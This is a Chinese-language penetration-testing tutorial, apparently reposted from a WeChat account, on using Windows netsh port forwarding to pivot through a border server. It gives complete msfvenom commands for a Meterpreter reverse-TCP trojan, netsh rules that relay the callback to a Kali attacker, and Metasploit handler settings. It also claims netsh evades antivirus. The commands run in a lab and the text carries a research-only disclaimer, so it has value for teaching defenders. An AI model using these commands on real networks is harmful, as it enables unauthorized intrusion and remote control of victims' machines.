netsh端口映射
netsh是Windows系统自带的一个命令行工具,内置端口转发功能
因为是自带,所以不会被杀毒软件查杀
netsh操作流程
命令使用
netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport
listenaddress - 等待连接的本地IP地址。
listenport - 本地侦听TCP端口。
connectaddress - 将传入连接重定向到本地或远程IP地址(或DNS名称)。
connectport - 一个TCP端口,来自listenport的连接会被转发到该端口。
环境搭建
边界服务器:10.10.10.12
内网:10.10.10.11
攻击机kali:192.168.44.128
实际操作
MSF生成木马放入内网机器
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.10.12 lport=5555 -f exe -o tcp.exe
//此处生成的木马,回连地址是边界服务器的IP地址
边界服务器上
netsh interface portproxy add v4tov4 listenport=5555 connectaddress=192.168.44.128 connectport=6666
//边界服务器监听自己的5555端口,并转发到kali机器上的6666端口上,此时我们只需要在kali上监听本机的6666端口,就可以实现访问10.10.10.11
netsh interface portproxy show all //查看代理情况
MSF监听
use /exploit/mulit/hander
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.44.128
set lport 6666
exploit -j -z
在内网机器上(10.10.10.11)运行木马
成功上线
进入shell看下是否真的是10.10.10.11
补充说明
清除指定规则
netsh interface portproxy delete v4tov4 listenport=6666
清除所有规则
netsh interface portproxy reset
netsh端口转发监听meterpreter
模拟环境
在服务器B上通过设置代理访问C服务器,拿到C服务器的权限
实际操作
MSF生成后门
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.10.12 lport=5555 -f exe -o rev-tcp.exe
边界服务器
netsh interface portproxy add v4tov4 listenport=5555 connectaddress=192.168.44.128 connectport=6666
MSF开启监听
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.44.128
set lport 6666
exploit -j -z
内网机器运行木马上线
原文始发于微信公众号(Nurburgring):netsh端口映射
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论